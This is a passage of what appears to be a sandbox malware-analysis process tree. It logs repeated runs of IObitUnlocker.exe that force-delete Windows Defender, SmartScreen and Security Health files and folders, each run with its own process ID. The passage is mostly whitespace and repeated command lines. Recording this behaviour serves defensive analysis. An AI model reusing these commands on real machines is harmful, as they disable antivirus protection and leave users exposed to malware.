Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4084
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:11480
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:11936
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:11492
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:12148
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5836
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:12176
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:11336
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
